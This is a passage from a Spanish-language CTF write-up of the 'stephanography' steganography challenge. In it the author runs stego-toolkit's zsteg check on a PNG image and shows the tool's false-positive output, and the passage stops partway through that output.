<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">El reto nos relata que el “...agente encubierto, Steph (nombre en clave: stncal), ahora usa una herramienta de steg en Github llamada "Appa"... ” . Por lo tanto podemos estar delante de una imagen portadora de un mensaje secreto oculto con un herramienta esteganográfica. Antes de pasar al OSINT en Github pasamos la herramienta stego-toolkit que nos arrojará posibles positivos:</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~/Stego/stego-toolkit/scripts</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># ./check_png.sh ~/CTF/CSACTF19/misc/stephanography/secret_new.png</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">....</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">###########################</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">########## zsteg ##########</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">###########################</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Watch out </span><span style="background-color: #1e1e1e; color: #569cd6; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">for</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> red output. This tool shows lots of </span><span style="background-color: #1e1e1e; color: #569cd6; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">false</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> positives...</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">imagedata .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"POOnooAA@"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,g,msb,xy .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"UUuUUuUUU"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,rgb,msb,xy .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"WU_U}U}}"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b4,g,msb,xy .. text: [</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"w"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> repeated 8 </span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">times</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">]</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b4,b,msb,xy .. file: MPEG ADTS, layer I, v2, 112 kbps, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b4,bgr,msb,xy .. file: MPEG ADTS, layer I, v2, 112 kbps, 24 kHz, JntStereo</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b5,b,lsb,xy .. file: MPEG ADTS, layer II, v1, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b5,bgr,lsb,xy .. file: MPEG ADTS, layer II, v1, JntStereo</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b6,g,msb,xy .. file: MPEG ADTS, layer I, v2, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b7,g,lsb,xy .. file: , 48 kHz, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,r,msb,xy .. file: RDI Acoustic Doppler Current Profiler (ADCP)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,b,msb,xy .. file: ddis/ddif</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,bgr,msb,xy .. file: ddis/ddif</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b1,bgr,msb,xy,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"MBl+W4hB"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,g,msb,xy,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"uUUUU]UUuW]"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,b,msb,xy,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"_UUUUUUuUWUUWUUUUUU]UUUU]UwUUUWUuUUUwUUUU]Uu"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,rgb,msb,xy,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"UWuWWUwU"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,bgr,msb,xy,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"UuuWuuuU"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b4,r,msb,xy,prime .. file: RDI Acoustic Doppler Current Profiler (ADCP)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b4,g,msb,xy,prime .. text: [</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"w"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> repeated 8 </span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">times</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">]</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b4,b,msb,xy,prime .. text: [</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"w"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> repeated 14 </span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">times</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">]</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b5,r,msb,xy,prime .. file: MPEG ADTS, layer II, v1, 48 kHz, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b6,r,msb,xy,prime .. file: MPEG ADTS, layer I, v2, 112 kbps, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b6,rgb,msb,xy,prime .. file: MPEG ADTS, layer I, v2, 112 kbps, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b7,r,lsb,xy,prime .. file: , Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b7,rgb,lsb,xy,prime .. file: , 48 kHz, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,rgb,lsb,xy,prime .. file: AIX core file 64-bit</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,bgr,msb,xy,prime .. file: RDI Acoustic Doppler Current Profiler (ADCP)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,r,msb,yx .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"uU_Uu_UU"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,g,msb,yx .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"UWwUwU]WwU"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,rgb,msb,yx .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"WU]_u}Uw"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b3,bgr,lsb,yx .. file: very old 16-bit-int big-endian archive</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b4,g,msb,yx .. file: RDI Acoustic Doppler Current Profiler (ADCP)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b5,g,msb,yx .. file: MPEG ADTS, layer II, v1, 48 kHz, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b5,bgr,lsb,yx .. file: MPEG ADTS, layer II, v1, 384 kbps, JntStereo</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b6,g,msb,yx .. file: MPEG ADTS, layer I, v2, 112 kbps, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b6,b,msb,yx .. file: MPEG ADTS, layer I, v2, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b7,g,lsb,yx .. file: , Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b7,b,lsb,yx .. file: , 48 kHz, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: 